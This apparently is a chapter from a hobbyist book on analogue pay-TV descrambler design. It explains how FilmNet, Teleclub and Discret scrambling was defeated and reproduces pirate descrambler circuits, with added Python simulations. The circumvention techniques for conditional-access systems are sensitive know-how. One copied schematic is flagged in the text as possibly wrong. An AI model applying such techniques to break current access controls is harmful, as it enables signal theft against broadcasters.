[Figure: CMOS Inverter Circuits.] 


The vertical blanking interval is also used to transmit the sequence of the 
inverted line. Most of the companies using this technique seem to think that 
this method is secure against hackers. If the sequence is not encrypted they 
have or rather will have a critical problem on their hands. Normally one or 
more lines that would have been used for teletext are pre-empted for 
descrambler information. For a hacker, such a line would be easy to strip. A 
line snatcher circuit for oscilloscopes was published in “Elektor Electronics” 
magazine. The function of the circuit was to strip the vertical interval test 
signals for analysing the response of various television circuits and links. 
The circuit was presettable as to which line it snatched. It is extremely easy 
to convert this circuit to snatch the descrambler data. 


Many of the early Teleclub descramblers sampled the black levels of the pre 
video lines in each field to ascertain the inversion sequence in use. This 
method was neutralised by Teleclub. A false sequence was incorporated in 
the pre video lines. 


Sequence detection is one of the easiest hacks for the system owner to 
disable. Since the hacker descrambler is expecting a sequence of a preset 
duration, any variation in time of that sequence will upset the descrambler. 
A change of sequence will also defeat the descrambler. This method was 
used by Teleclub to defeat the switchable sequence descramblers. The 
sequence in these descramblers was set manually using a bank of DIL 
switches. By changing the inversion sequence inside a ten second period, it 
became impossible for the user to reset the sequence. 


Line Inversion: 


Line inversion is rarely used without synch suppression. The complete line 
is inverted. This is the easiest form of inversion to hack. The suppressed 
horizontal synch can be used as a key to determine the polarity. 


This inversion type is used on the FilmNet system. As such it is the most 
widely analysed type. The countermeasures adopted by FilmNet have been 
rather clever but were never totally successful. They were all hacked inside 
an hour. 


[Figure: Polarity Detection - Inversion Types. Caption fragment: "... actual 
inversion point occurs in the VBI rather than in the vertical blanking pulse."] 


NOKEY Suppressed Synch Methods 


A NOKEY system has no key that identifies the video as inverted or normal 
to the official descrambler. The inversion sequence is determined by an 
algorithm. The systems using this type of scrambling are generally 
addressable. 


Comparative Level Detection: 


The comparative level detection circuit compares a sample of the horizontal 
synch pulse tip with a sample of the horizontal blanking level. In a normal 
polarity signal the tip of the horizontal synch pulse should be lower than the 
blanking level. 


The circuit is only active during the horizontal blanking period. The output of 
the circuit is used to trigger a flip-flop or a monostable. The output of the 
monostable or flip-flop controls the video multiplexer. The sample points 
can be derived from monostables or from a system clock. Most of the 
present FilmNet descramblers use clock derived slots. 


This is one of the most widely used methods of polarity detection on the 
FilmNet system. It can be defeated by placing a pulse at the point in the 
horizontal synch pulse where the sample is taken. The descramblers that 
used clock derived sample points were most vulnerable to this upgrade. 
This is one of the countermeasures that was used on the FilmNet system 
though it was dropped because the descramblers were upgraded too easily. 


Synch Tip Detection: 


Synch tip detection is one of the easier types of level detection to 
implement. There is only one level to be detected. The detection occurs 
after the horizontal blanking section of the line has been pulled down to its 
normal level. If the polarity is correct then the level of the horizontal synch 
pulse tip should be at, or very close to, the clamp voltage. If the comparator 
detects a level greater than the clamp voltage then it will reset the flip-flop. 


This type of polarity detector was first used in the Oak ORION descrambler 
design in the Pink And Brown Book. In that application it was used to detect 
the polarity key. Hi Tech Xtravision implemented this type of detector design 
in their FilmNet descrambler. The design differed from the Pink And Brown 
Book version in that it used CMOS rather than TTL. It is the most reliable 
method of polarity detection but it can be defeated. 


The FilmNet SATPAC upgrade of 05/11/90 was primarily intended to take 
out descramblers that were using this type of detector. The upgrade was a 
sine wave of near colour burst frequency. This had the effect of confusing 
the comparator. A later upgrade amplitude modulated the level of the sine 
wave using a very slow sine wave of approximately 1 Hz. This upgrade is 
similar to a facility in the IRDETO system. In that system, the digital audio 
level can be amplitude modulated by a 15 Hz sine wave. The circuit can be 
upgraded to cope with these countermeasures. It only requires the addition 
of two capacitors. 


Energy Concentration Detection: 


This is one of the more difficult methods to implement. It is also one of the 
more reliable. The energy level at the start of the video section of each line 
is sampled. If the level falls within the upper voltage window, the video is 
inverted. If the level falls within the lower window then the video is normal. 
The outputs of the comparators are fed to a logic circuit that controls the 
video multiplexer's monostable or flip-flop. 


This type of detection generally requires a system clock in the region of 4 
MHz. This is why many of the microcontroller based descramblers use it. It 
can be implemented by simpler circuitry. 


The colour burst generally remains in the same time slot in the scrambled 
video as it would in the normal video. The burst is used as the reference to 
which a phase locked loop such as the 4046 is locked. 


A monostable derived or logic time derived slot is then used to trigger the 
sampling circuitry. The logic derived slot is the preferred method. A 
triggered monostable can be trickier to set up in production as a capacitor 
and preset combination would have to be used to get the timing precise. 
Component aging and heating would also affect the monostable compo- 
nents thus changing the slot over the lifetime of the decoder. Ideally the 
phase locked loop will be running at a multiple of the line frequency. For a 
500 ns slot, a clock frequency of at least 2 MHz would be required. 
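The comparative level, synch tip and energy concentration detectors of the 
preceding sections, together with the sample-slot pulse and blanking sine 
wave countermeasures and the averaging ("two capacitors") fix, as an added 
Python model. This is example code, not a circuit from this book or from any 
FilmNet descrambler: the sample rate, voltage levels, slot positions, window 
widths and the constructed test picture are all assumptions. 

```python
"""Model of the three NOKEY polarity detectors (comparative level, synch
tip, energy concentration) on a suppressed-synch, line-inverted signal of
the FilmNet type, plus two countermeasures and the low-pass fix.
Added example: sample rate, levels, slots and windows are assumptions."""
import math

FS = 8_000_000            # assumed sample rate, 125 ns per sample
N = 512                   # one 64 us line
SYNC_END = 37             # 4.7 us synch pulse occupies samples 0..36
BURST = (44, 64)          # colour burst slot, 5.6 us .. 8.1 us
VIDEO_START = 96          # active video begins at 12 us
SYNC_TIP, BLANK, WHITE = 0.0, 0.3, 1.0     # volts, 1 V p-p video assumed
MID = (SYNC_TIP + WHITE) / 2               # axis the scrambler inverts about
TIP_IDX, BLANK_IDX = 18, 88                # fixed clock-derived sample slots


def clear_line(picture):
    """One clear line; picture(x) is luminance 0..1 at fraction x of active video."""
    line = []
    for i in range(N):
        if i < SYNC_END:
            v = SYNC_TIP
        elif BURST[0] <= i < BURST[1]:
            v = BLANK + 0.15 * math.sin(2 * math.pi * 4.43e6 * i / FS)
        elif i < VIDEO_START:
            v = BLANK
        else:
            v = BLANK + (WHITE - BLANK) * picture((i - VIDEO_START) / (N - VIDEO_START))
        line.append(v)
    return line


def scramble(line, invert):
    """Suppressed synch (tip raised to 0.15 V below blanking), then optionally
    the whole line inverted about MID."""
    out = [BLANK - 0.15 if i < SYNC_END else v for i, v in enumerate(line)]
    return [2 * MID - v for v in out] if invert else out


# Each detector returns True when it decides the line is inverted.
def comparative_level(line):
    """Synch tip sample against blanking sample: tip below blanking is normal."""
    return line[TIP_IDX] >= line[BLANK_IDX]


def sync_tip(line, margin=0.05, lowpass=1):
    """Clamp blanking to BLANK, then test the tip against that single level.
    lowpass>1 averages that many samples ending at each slot: the 'two
    capacitors' upgrade that rides out a superimposed sine wave."""
    def sample(idx):
        return sum(line[idx - lowpass + 1: idx + 1]) / lowpass
    clamp_offset = BLANK - sample(BLANK_IDX)
    return sample(TIP_IDX) + clamp_offset > BLANK + margin


def energy_concentration(line, window=16):
    """Average the first samples of active video: lower window means normal,
    upper window means inverted, anything else is undecided (hold state)."""
    avg = sum(line[VIDEO_START:VIDEO_START + window]) / window
    if SYNC_TIP <= avg <= MID - 0.05:
        return False
    if MID + 0.05 <= avg <= WHITE + 0.05:
        return True
    return None


# Countermeasures of the kind FilmNet used against fixed-slot detectors.
def cm_pulse_on_slot(line, width=3):
    """Short pulse of the opposite level placed exactly on the tip sample slot."""
    out = list(line)
    for i in range(TIP_IDX - 1, TIP_IDX - 1 + width):
        out[i] = 2 * MID - out[i]
    return out


def cm_sine_on_blanking(line, amp=0.15, freq=4.3e6):
    """Sine wave near burst frequency across the blanking interval (05/11/90 style)."""
    return [v + amp * math.sin(2 * math.pi * freq * i / FS) if i < VIDEO_START else v
            for i, v in enumerate(line)]


if __name__ == "__main__":
    pic = lambda x: 0.1 + 0.8 * x           # constructed picture: dark left edge
    for inv in (False, True):
        s = scramble(clear_line(pic), inv)
        print("inverted" if inv else "normal", comparative_level(s), sync_tip(s),
              energy_concentration(s), comparative_level(cm_pulse_on_slot(s)),
              sync_tip(cm_sine_on_blanking(s)), sync_tip(cm_sine_on_blanking(s), lowpass=8))
```

The model reproduces the point made in the text: a detector that looks at 
one fixed slot in the synch can be fooled by a pulse on exactly that slot, and 
a single-level comparator can be swamped by a sine riding on the blanking, 
whereas averaging across several samples or looking at the start of the 
video instead of the synch survives both. 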


KEYED Suppressed Synch Methods 


A keyed system has a key that instructs the official descrambler as to the 
polarity of the video. It is a very insecure method and apart from the 
LuxCrypt and the OAK ORION systems, it is not really used any more. 
Key Detection: 


The circuits used for NOKEY polarity detection can be used for KEY polarity 
detection. The primary difference is in the timing of the sample slot. Most of 
the keys are after the colour burst and before the start of video. 


Polarity Detection - Clean Synch methods: 


Polarity detection is harder in clean synch systems. In a clean synch 
system, the synchs are not suppressed. If the designer knows what he is 
doing, he can make things very difficult for the hacker. 


Energy Concentration Detection: 


The same circuitry as used in the suppressed synch case can be used for 
this application. The timing reference can be the horizontal synch pulse or 
the colour burst. The burst is the more reliable of the two as the horizontal 
synch pulse can be dithered as in the PayView III system that was used by 
Teleclub. 


Line Video Delays And Pseudo Line Delays 


Video Delays: 


The delay of the video on a line by line basis is the basis of the Discret 
systems. There are a number of methods used to delay the video. The 
official Discret 1 descramblers used charge coupled device (CCD) delay 
lines. The later PAL - SECAM Discret system used digital techniques to 
delay the video. 


The delays used in the system were 0 ns, 902 ns and 1804 ns. The 
hackers of the Discret system used a colour transient improver IC, the 
TDA4560, to create the two delays required to hack the system. 


The TDA4560 contained a gyrator delay line that produced a delay of 888 
ns. The TDA4560 has been superseded by the TDA4565. This IC is used in 
many of the descramblers used for the RAI service and on many small 
cablenets. 


The gyrator delay line in the TDA4565 can cope with signals up to 5.5 MHz 
without any serious degradation. The downside of the argument is that the 
IC has a through loss of 6 dB. This means that the video signal at the output 
has to be amplified by 6 dB. In the "Radio Plans" descrambler given in the 
case study, this amplification was achieved by using a TBA970. The NE592 
could also be used for this purpose but it would require black level clamping. 


Other attempts at fabricating delay lines were made. These ranged from 
custom glass delay lines that were manufactured by an Italian factory to a 
lumped inductor capacitor delay line. 


The digital approach to video delay was used by the official descramblers. 
They use a sampling frequency of four times the colour burst frequency, 
(17.735 MHz). This resulted in a cleaner picture definition on the descram- 
bled picture. 


Pseudo Line Delay: 


This technique has to be one of the cleverest methods of not delaying the 
video. The horizontal synch pulse is shortened and dithered in the horizontal 
blanking area. This creates the effect of line delay but the video starts in the 
normal position. It is only the position of the horizontal synch pulse that 
changes. 


Teleclub's old system, PayView III, had this facility. When used it had a 90% 
kill rate on the pirate descrambler market. The only descramblers that 
survived were those that re-inserted a new horizontal synch pulse. 


While most of the pirate descramblers that survived used the colour burst 
slot as the timing reference, there were some that took a more novel 
approach. The horizontal blanking in the PayView III system is raised above 
peak white. By using a comparator to detect the rising edge of the transition 
to the raised horizontal blanking, a retimed and recreated horizontal synch 
pulse could be inserted in the horizontal blanking period. 


Autoswitching 


The term “autoswitching” means that the descrambler will detect а 
scrambled signal and descramble it automatically without the intervention of 
the user. The descrambler will route the descrambled video to the return 
video input on the receiver or to the direct video input of a television. The 
SCART or the D-Type connector are commonly used on the ASTRA type 
receivers. These connectors have all the outputs and inputs necessary to 
interface a descrambler with the receiver. On ASTRA receivers there will be 
a descrambler SCART or D-Type. The descrambler SCART differs from the 
standard SCART. (Chapter 9 examines this topic in more detail.) In the 
case of a SCART or D-Type connector the descrambler must supply a 
switching voltage to the control pin to make the receiver accept the 
descrambled video signal rather than the receiver demodulator output. When 
the standard SCART is being used to supply a television with the descrambled 
video, the same switching voltage at pin 8 on the SCART must be present. 
The voltage should be 12 Volts for external video and audio source 
selection and 0 Volts for internal select. 


The detection of a scrambled signal is crucial to the autoswitching process. 
The official descramblers detect the addressing data in the scrambled 
signal. The Sky VideoCrypt descrambler will put up a channel identifier 
when it is fed with the scrambled Sky Movies signal. It also activates a 
switching pin on the descrambler SCART to switch the decoder into the loop. 
Internal versions use a multiplexer to effect the switch over. Sometimes 
when this multiplexing IC blows there is no video on scrambled or clear 
channels. 


The actual type of autoswitching control is very much dependent on the 
descrambler’s operation. For a descrambler that uses a composite synch 
carrier technique, the circuitry is extremely simple. The FilmNet SATPAC 
system was a good example. 


When FilmNet was scrambled the composite synch carrier at 7.56 MHz 
carried the composite synch signal necessary to descramble the signal. 
When the signal was not scrambled, the composite synch signal was not 
transmitted on the 7.56 MHz. The autoswitching circuit would have to detect 
the absence or presence of the composite synch signal. The main 
consideration is that the circuit doesn't trigger on an audio signal. 


In most of the FilmNet descramblers, the field pulse was separated from the 
composite synch signal. This pulse train of field pulses is fed to an 
integrator. The inverter on the output of the integrator will only change state 
when the capacitor is sufficiently charged. The inverter output is high when 
there is no composite synch signal. The basic circuit given in the diagram 
could be adapted for most designs. 


There are other methods for implementing autoswitching. These generally 
involve detecting the absence of the horizontal synch or detecting the 
inverted synch. The overall circuits used in these operations can be 
complex. 


Detecting the absence of the horizontal synch is perhaps one of the simpler 
operations. The circuit used can be a straight comparator circuit as shown 
elsewhere in this chapter. The output of the comparator will be a clean 
synch train in the case of clear video. 


The alternate field inversion used by FilmNet made autoswitching easy to 
implement. Since the inversion was on a field basis, the switching waveform 
for controlling the video polarity selection was a 25 Hz square wave. The 
high section of the square wave was used to select inverted video. This 
square wave was also used in the descrambler to identify the scrambled 
signal. In the case of a straight synch suppressed signal with no inversion, 
there was no square wave. The absence of the square wave indicated to 
the descrambler that video signal was clear rather than scrambled. 


Implementing autoswitching with LuxCrypt descramblers is also straightfor- 
ward. Since there would be no horizontal or vertical synch, this could act as 
a trigger. Since many of the descramblers designed for this system use 
PLLs, the second trigger would be a locked PLL. 


Phase Locked Loops 


The circuits given in the PLL diagrams are representative of some of the 
circuits used in descramblers. The 4046 is one of the most easily obtainable 
PLL ICs. It has been used extensively in non- commercial applications. 
Some of these designs were FilmNet and ORION decoders where the PLL 
ran at 15625 Hz to regenerate a line synch signal. 


The main use of phase locked loops in descramblers is in the process of 
synch regeneration. It is not the intention of this chapter to teach the 
rudiments of phase locked loops to the reader. One of the best explanations 
of the operation and design of PLLs can be found on pages 428 to 437 of 
The Art Of Electronics by Horowitz and Hill. 


In order to use a phase locked loop there must be some reference signal. 
This is generally a straightforward process if some reference signal such as 
the composite synch signal transmitted on FilmNet is present. Alternatively 
the suppressed horizontal synchs can be used. These would need to be 
sampled in order to be of use. 


In descramblers, the commonest form of phase locked loop is one that runs 
at a multiple of the input or reference frequency. In the FilmNet signal, a 
signal must be derived to pull down the horizontal synch section to its 
correct level. Using a PLL running at 15625 Hz does limit the designer to 
using monostables to generate pulses such as those required for polarity 
testing. A PLL that uses a low frequency input to generate a high frequency 
output is commonly known as a frequency multiplier type. The PLL based 
FilmNet descrambler shown later in this chapter is a good example of this 
type of PLL. 


In the PLL based FilmNet descrambler, the 2.0 MHz running frequency is 
divided down using combinational logic. The combinational logic provides a 
pulse of the correct duration for the synch pulldown. It also can be used to 
derive other signals such as a sample gate pulse or a polarity test pulse. 
3: Descrambler Building Blocks 


The 4046 Phase Locked Loop 
Case Study: PLL Based FilmNet Descrambler 


FilmNet has switched from SATPAC to D2-MAC EuroCrypt-M. The reason 
that this circuit is incorporated in version 5 is that it is a good example of 
what can be achieved with a purely analogue approach as opposed to using 
a microcontroller. There are also reports that FilmNet are using the 
SATPAC system on a link to Greece so this circuit may still have some 
application. 


This FilmNet descrambler uses a 2 MHz phase lock loop to provide the 
horizontal blanking. Autoswitching is included though no provision for 
polarity detection is made. The circuit uses commonly available parts. 


This circuit is for the main part the Hi Tech XtraVision FilmNet 
descrambler. It is reproduced here courtesy of Hi Tech. 


The Composite Sync Demodulator 


The FilmNet SATPAC system transmits a composite synch signal on a 
subcarrier at 7.56 MHz. The descrambling of the FilmNet signal involves the 
demodulation of this carrier and using it to reinsert the synch levels in the 
picture. 


The demodulator is based on the TBA120S quadrature demodulator IC. 
Two off-the-shelf 10.7 MHz transformers are used to make the set up 
simple. These transformers are made resonant at the correct frequency by 
the addition of capacitors in parallel with the internal capacitors. The use of 
NPO capacitors is essential in this application. 


With the values given, the output of the composite synch is approximately 
1V0 peak. This composite synch signal is fed to a 311 comparator which 
produces a negative going synch output. This signal is fed to the main logic 
section. 


The Logic Section 


The first part of the logic section is a phase adjustment. This is used to 
properly position the horizontal blanking window relative to the video. 


The inverters are 40106 Schmitt types. The phase detector is a 4070 EXOR 
gate followed by an integrator. The output of the integrator is the error 
voltage and is used to control the frequency of the VCXO. 


The VCXO is based on the 74HC04 inverter IC. This IC requires a supply of 
5V0 to operate correctly. Its primary advantage is its low current operation. 
The output of the VCXO is converted to a 12V pk to pk signal by the 
transistor buffer. 


The buffered 2 MHz signal from the VCXO is fed to the 4520 dual binary 
counter. This IC is used to divide the 2 MHz frequency. The use of 
combinational logic on the outputs produces a properly timed horizontal 
blanking window. This horizontal blanking signal is combined with the output 
of the field pulse separator, (integrator), to provide a properly timed 
composite blanking signal. This signal is used to control the synch insertion 
section of the video strip. An AND gate ensures that there is no synch signal 
when the descrambler circuitry is disabled by the autoswitching circuit. 
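The following Python model is an added example for this edition and is not 
part of the Hi-Tech circuit. It treats the 2 MHz VCXO divided by 128 as a 
line counter, as the 4520 chain does, and shows how each timing pulse 
reduces to a range of counter states decoded by combinational logic, 
including the composite blanking with the field pulse ORed in and the 
autoswitch enable ANDed in. The synch, burst and blanking widths are PAL 
nominal values; the sample gate and polarity test positions are assumptions 
of the example, not values taken from the circuit. 

```python
"""Counter plus combinational decode of a 2 MHz line-locked clock.
Added example: the window positions below are PAL nominal values and
assumptions, not the Hi-Tech FilmNet circuit."""

CLOCK_HZ = 2_000_000
LINE_HZ = 15_625
COUNTS_PER_LINE = CLOCK_HZ // LINE_HZ   # 128 counter states per 64 us line
US_PER_COUNT = 1e6 / CLOCK_HZ           # 0.5 us per count

# Timing windows in microseconds from the leading edge of line synch, which
# is counter state 0 once the loop is locked.  synch, burst and blanking are
# PAL nominal values; the sample gate and polarity test slots are positions
# assumed by this example.
WINDOWS_US = {
    "synch": (0.0, 4.7),
    "burst": (5.6, 7.85),
    "blanking": (0.0, 12.0),
    "sample_gate": (8.5, 10.5),      # back porch, after the burst (assumed)
    "polarity_test": (12.0, 14.0),   # first 2 us of active video (assumed)
}


def window_counts(start_us, end_us):
    """Counter states [first, last] that decode a window, on the 0.5 us
    grid the 2 MHz clock allows."""
    first = round(start_us / US_PER_COUNT)
    last = round(end_us / US_PER_COUNT) - 1
    return first, last


def decode(count):
    """The combinational logic: which pulses are active for one counter
    state of the divider chain."""
    count %= COUNTS_PER_LINE
    active = set()
    for name, (s, e) in WINDOWS_US.items():
        first, last = window_counts(s, e)
        if first <= count <= last:
            active.add(name)
    return active


def pulse_width_us(name):
    """Width actually produced after rounding to the counter grid."""
    first, last = window_counts(*WINDOWS_US[name])
    return (last - first + 1) * US_PER_COUNT


def composite_blanking(field_pulse, enabled=True):
    """One line of the composite blanking signal: the line blanking window
    ORed with the field pulse from the integrator, then ANDed with the
    autoswitch enable so no synch is inserted when the descrambler is off."""
    return [enabled and (field_pulse or "blanking" in decode(c))
            for c in range(COUNTS_PER_LINE)]
```

Because the grid is 0.5 us, the 4.7 us synch rounds to 4.5 us; a finer 
grid needs a higher clock or a second monostable, which is the trade-off 
the text describes for the 15625 Hz PLLs. 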


The autoswitching circuit integrates the field pulses. If the receiver is not 
tuned to FilmNet, there is no field pulse present at the input to this circuit. 
This will cause S1 to close and S2 to open. This action passes normal 
polarity video to the video clamping and output stage. The output of the 
composite blanking AND gate is forced low by this circuit. 


The Video Strip 


The NE592 is used to provide a variable gain amplifier. The positive and 
negative outputs are fed to a number of 4066 switches. The first two 
switches, S1 and S2, control the selection of the video. 


Control 
S1 S2 

0  1  Normal Video, Descrambler Off 
1  0  Descrambler Active 


The control signal for S2 could be used to effect loopthrough on some of the 
ASTRA receivers. 


The second set of switches, S3 and S4, are the field polarity selectors. 
These are controlled by the outputs of the field polarity flipflop in the logic 
section. A preset is included so that any DC offset between the outputs can 
be nulled. 


The selected video source is fed to a clamp to remove the dispersal 
waveform. The synch pull down is effected by turning on and off a transistor 
switch. The level of pull down is controlled by the 47K preset. 
Case Study: The "Radio Plans" Design 


This is the circuit that was published in the "Radio Plans" magazine. The 
magazine issue was seized by the courts. A French newspaper, "Le 
Quotidien", then published the controversial design. In that way the design 
reached more people than it ever would have. It also became public 
knowledge. 


The "Radio Plans" descrambler was designed for use on a SECAM signal 
rather than a PAL signal. The timing on the PAL version is slightly different. 
In terms of commercial hacking the "Radio Plans" descrambler is not viable. 
Most of the subsequent hacker circuits replaced major sections of the circuit 
with simpler more repeatable circuitry. The resulting descrambler was 
cheaper and overcame the chip shortage problem that occurred. 


The versions of Discret currently in operation have, in the majority of cases, 
been upgraded to counter this particular design. It is highly illegal to use a 
pirate descrambler in France. It is also illegal to use a pirate cable 
descrambler in Ireland. The following case study is for informational use 
only. 


The Radio Plans circuit can be considered as five sections; the audio 
descrambler, the start of video detector; the video descrambler; the video 
multiplexing section and the synch generator circuit. The design used a 
number of rather expensive integrated circuits. It was exceedingly popular 
with the home constructors. The shops selling the kits had to reorder the 
components by the hundred. This massive demand led to a shortage of the 
critical ICs. Hackers were forced to improvise and adapt other circuits. 
Some of these adapted circuits are shown later. 


The Audio Descrambler 


The audio in the Discret system is rotated about a 12.8 KHz carrier. The 
"Radio Plans" design uses a crystal oscillator running at 3.2768 MHz. The 
oscillator is based on two 4584 CMOS inverters. One inverter is used as the 
oscillator and the other inverter is used as the buffer. 


The output of the oscillator is fed to a 4020 divider. This divides the 
oscillator frequency by 256 to produce the 12.8 KHz carrier. The output of 
the 4020 is fed to a transistor filter. This is used to filter the harmonics 
present and to convert the square wave to a sine wave. 


The 12.8 KHz sine wave is then fed to a 1496 balanced demodulator IC. 
The 1496 circuit is configured for single rail operation. The scrambled audio 
is also fed to this IC. A 47K preset provides balancing and cancellation 
control. 
The output of the 1496 is fed to a single transistor filter to remove any 
remaining 12.8 KHz signal from the descrambled audio. The descrambled 
audio is then fed back to the SCART connector. 
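As an added example (not the Radio Plans circuit), the audio inversion can 
be checked in software: the balanced modulator is a multiplication by the 
12.8 KHz carrier and the transistor filter is a low pass, so a 3 KHz tone 
comes out at 9.8 KHz and a second pass puts it back where it was. The 
sample rate, filter length and test tone are assumptions of the example. 

```python
"""Spectral inversion of audio about a 12.8 kHz carrier, modelled in
software.  Added example, not the Radio Plans circuit; sample rate, tone
and filter length are the example's own assumptions."""
import math

FS = 64_000          # model sample rate, an assumption of the example
CARRIER = 12_800.0   # 3.2768 MHz / 256, as in the Radio Plans design
N = 3200             # 50 ms of samples: probe frequencies fall on 20 Hz bins


def tone(freq, n=N, fs=FS):
    """A single audio tone, constructed test input."""
    return [math.sin(2 * math.pi * freq * i / fs) for i in range(n)]


def balanced_modulate(x, fc=CARRIER, fs=FS):
    """The 1496 stage: the product of the audio with the carrier puts each
    input component f at fc - f and fc + f."""
    return [v * math.cos(2 * math.pi * fc * i / fs) for i, v in enumerate(x)]


def lowpass(x, cutoff, taps=129, fs=FS):
    """Windowed-sinc FIR low pass standing in for the transistor filter
    that removes the fc + f image and any residual carrier."""
    m = taps - 1
    fc = cutoff / fs
    h = []
    for k in range(taps):
        t = k - m / 2
        sinc = 2 * fc if t == 0 else math.sin(2 * math.pi * fc * t) / (math.pi * t)
        h.append(sinc * (0.54 - 0.46 * math.cos(2 * math.pi * k / m)))
    gain = sum(h)
    h = [v / gain for v in h]
    return [sum(h[k] * x[i - k] for k in range(min(taps, i + 1)))
            for i in range(len(x))]


def goertzel_power(x, freq, fs=FS):
    """Signal power at one frequency (Goertzel), the spectrum probe."""
    w = 2 * math.pi * freq / fs
    coeff = 2 * math.cos(w)
    s1 = s2 = 0.0
    for v in x:
        s0 = v + coeff * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def invert_spectrum(x):
    """One pass through the descrambler.  The scrambler does the same
    thing, so applying it twice returns the original audio."""
    return lowpass(balanced_modulate(x), CARRIER)


def dominant(x, candidates):
    """Which of the candidate frequencies carries the most power."""
    return max(candidates, key=lambda f: goertzel_power(x, f))
```

The low pass has to sit close to the carrier: anything it lets through 
above 12.8 KHz is the unwanted image, and anything it cuts below is lost 
audio, which is why the single transistor filter in the hardware is a 
compromise rather than a brick wall. 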


The Start Of Video Detector 


The scrambled video from the output of the first TBA970 on the video 
descrambler section is fed to a transistor two stage low pass filter. This filter 
removes the chrominance from the video waveform. The resulting video 
signal is then amplified by a factor of five. The signal from the op-amp is fed 
to the back level sample and hold and to the comparator. 


The sample and hold circuit is based on a 4066 as the sampling switch and 
a polystyrene 1n5 capacitor as the storage or hold capacitor. The op-amp 
used as the buffer is a simple TL072 type. In this application it is configured 
as a non inverting amplifier with unity gain. The output of the amplifier is fed 
to the comparator. 


The comparator is continually comparing the voltage difference between the 
sampled black level and the video signal. It has to detect a rise of 
approximately 150 mV. The sample gate is controlled by the sandcastle 
pulse generated by the synch generator circuit. The output of the compara- 
tor is fed to a transistor level converter. This converts the comparator output 
to CMOS logic levels. It is not strictly required. 


The sandcastle pulse also triggers the first monostable. This generates a 
delay to position the start of video window in the correct area of the line. The 
output of this monostable controls the enabling of the start of video pulse 
monostable. This second monostable generates a fixed length pulse to 
indicate the start of video. 


The Video Descrambler 


The video descrambler section is composed of delay lines and black level 
clampers and amplifiers. The delay lines used are the TDA4560. These are 
configured to give an 888 nS delay on the video. The TDA4560 gyrator 
delay line has a good response as far as 5 MHz. The gyrator delay line has 
a loss of 6 dB. This means that some amplification is required to restore the 
level to normal. The signal must also have black level clamping. This is 
essential for proper descrambling. If there is a difference in black levels 
between each of the delayed video signals, there will be strobing on the 
screen. This effect is similar to the effect on some FilmNet descramblers 
when the two fields are not at the same level. 
There are four outputs from the video descrambler. Three, one from each 
TBA970, are fed to the video multiplexing circuitry. The output from the first 
TBA970 is also fed to the Start Of Video Detector circuit. 


The Video Multiplexing Circuitry 


There are basically four elements in this section. The first of these is the 
monostable timing chain. This is a chain of three monostables. The first 
monostable generates a delay that positions the outputs of the two other 
monostables. These other monostables generate the windows or Data 
signals for the flipflops. 


The flipflops control the multiplexer. The D pin on each flipflop is only high 
during its respective window. This means it is only possible for the flipflop to 
change the state of its output during that window. The start of video pulse 
provides the clocking pulse (CL) on each flipflop. The LI signal from the 
synch generator circuit is fed to the RESET pin on each flipflop. This 
ensures that the multiplexers are switched to the two delay mode by 
resetting the flipflops at the start of the horizontal synch pulse. This is to 
ensure that the synch and colour burst section of the line pass through 
without being delayed. This is essential for proper line stability in the 
descrambled picture. 


The multiplexer used is the 4053. This IC has three single pole double throw 
(SPDT) switches. Only two of the switches are actually used in this design. 
In some of the commercial pirate designs, a single 4066 with two inverters 
was used to replace the 4053. 


The output of the second multiplexer switch is fed to the video amplifier. 
This is the TDA1034 or LM318 operational amplifier. The output from the 
TDA1034 is taken to the push pull amplifier. The complete video amplifier 
section is replaced in most of the pirate designs by a single transistor 
emitter follower on the output of the second multiplexer switch. 


The Synch Generator 


This section of the circuit is used to generate the sandcastle control signal 
and the LI control signal. It strips the synchs from the scrambled video and 
uses them to phase lock a line oscillator. 


It is a standard television horizontal synch circuit but has proven to be too 
costly for anything other than home construction. This circuit has largely 
been replaced by a synch stripper and monostable combination. 
RP Synch Generator Circuit 


Note: The photocopy of this circuit was 
not clear. Some of the connections and 
values may be wrong. 
Field Pulse Derived Carrier (12.8 KHz) 


(Block diagram: the 50 Hz field pulse is the reference input of a 4046 
PLL whose feedback path contains a divide by 256, so the VCO output is 
the 12.8 KHz carrier that feeds the audio descrambler.) 


Hacker Synch Stripper For Discret Timing 


(Block diagram: a synch stripper producing HS, a field integrator, and 
the H synch, burst gate and video line timing signals derived from them.) 


The comparator synch stripper circuit is given 
elsewhere in this chapter. 
The Hi-Tech Discret J Card 


The Discret card is perhaps one of the best examples of what can be 
achieved with a microcontroller based design. It is built around a 68705 
EPROM type microcontroller. 


The Discret system operates by delaying the video in each line by one of 
three delays; 0 nS, 902 nS or 1804 nS. The standard method of 
descrambling the signal was pioneered by the Radio Plans design. The 
method involved detecting the rise from black level to the start of video. If 
the video was not delayed, the two delay units were added. If the video was 
delayed by one unit, then another delay unit was added. If the video was 
delayed by two units then it was gated straight through. This created a black 
band at the left hand side of the screen, but on most television it was lost on 
the overscan. 


The problem with trying to detect the rise from black level was that it was 
wide open to countermeasure by the programme provider. To nuke the first 
Radio Plans based descramblers, all Canal Plus had to do was insert a level 
other than black in the delay area. The descramblers could not find the 
black level and hence their detection circuitry failed. 


Hi-Tech has kept the video descrambling section and used a different 
method for slotting in the delays. The necessary data to descramble the 
signal is transmitted in one of the VBI lines. By using this information and 
processing it with the 68705, it is possible to set the delay slots without 
using the rise from black detection. 
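The rise from black method, the countermeasure and the keyed alternative 
can be simulated in a few lines. This is an added example, not the Radio 
Plans or Hi-Tech circuit, and it covers both the Start Of Video Detector of 
the Radio Plans design and the delay slotting described for the J Card. The 
sample grid, the video levels and the assumption that every picture line 
begins above the 150 mV threshold are the example's own; the three delays 
are from the text. 

```python
"""Simulation of Discret line-delay scrambling, the rise-from-black
descrambler, the non-black filler countermeasure, and a keyed descrambler
that is simply told the delay.  Added example, not any circuit on the
page; grid, levels and picture content are assumptions."""
import random

SAMPLE_NS = 41                       # assumed model grid: 22 samples = 902 ns
UNIT = 902 // SAMPLE_NS              # one delay unit in samples (22)
LINE = 64_000 // SAMPLE_NS           # samples in a 64 us line (1560)
ACTIVE_START = 12_000 // SAMPLE_NS   # synch and burst occupy the first 12 us
BLACK, WHITE = 0.0, 0.7              # volts, PAL picture range
RISE_THRESHOLD = 0.15                # comparator threshold quoted in the text


def make_line(seed):
    """A clear line: black through the synch and burst region, then picture
    content whose every sample is above the detection threshold (assumed)."""
    rnd = random.Random(seed)
    line = [BLACK] * LINE
    for i in range(ACTIVE_START, LINE):
        line[i] = round(rnd.uniform(0.2, WHITE), 3)
    return line


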